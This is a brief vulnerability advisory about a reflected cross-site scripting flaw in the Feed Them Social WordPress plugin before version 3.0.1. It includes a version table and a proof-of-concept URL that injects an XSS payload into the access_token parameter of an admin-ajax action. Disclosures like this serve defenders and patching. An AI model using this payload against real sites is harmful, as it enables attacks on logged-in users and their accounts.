The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
Against any authenticated user: https://example.com/wp-admin/admin-ajax.php?action=fts_encrypt_token_ajax&access;_token=<img src=x onerror=alert(/XSS/)>
CPE | Name | Operator | Version |
---|---|---|---|
feed-them-social | lt | 3.0.1 |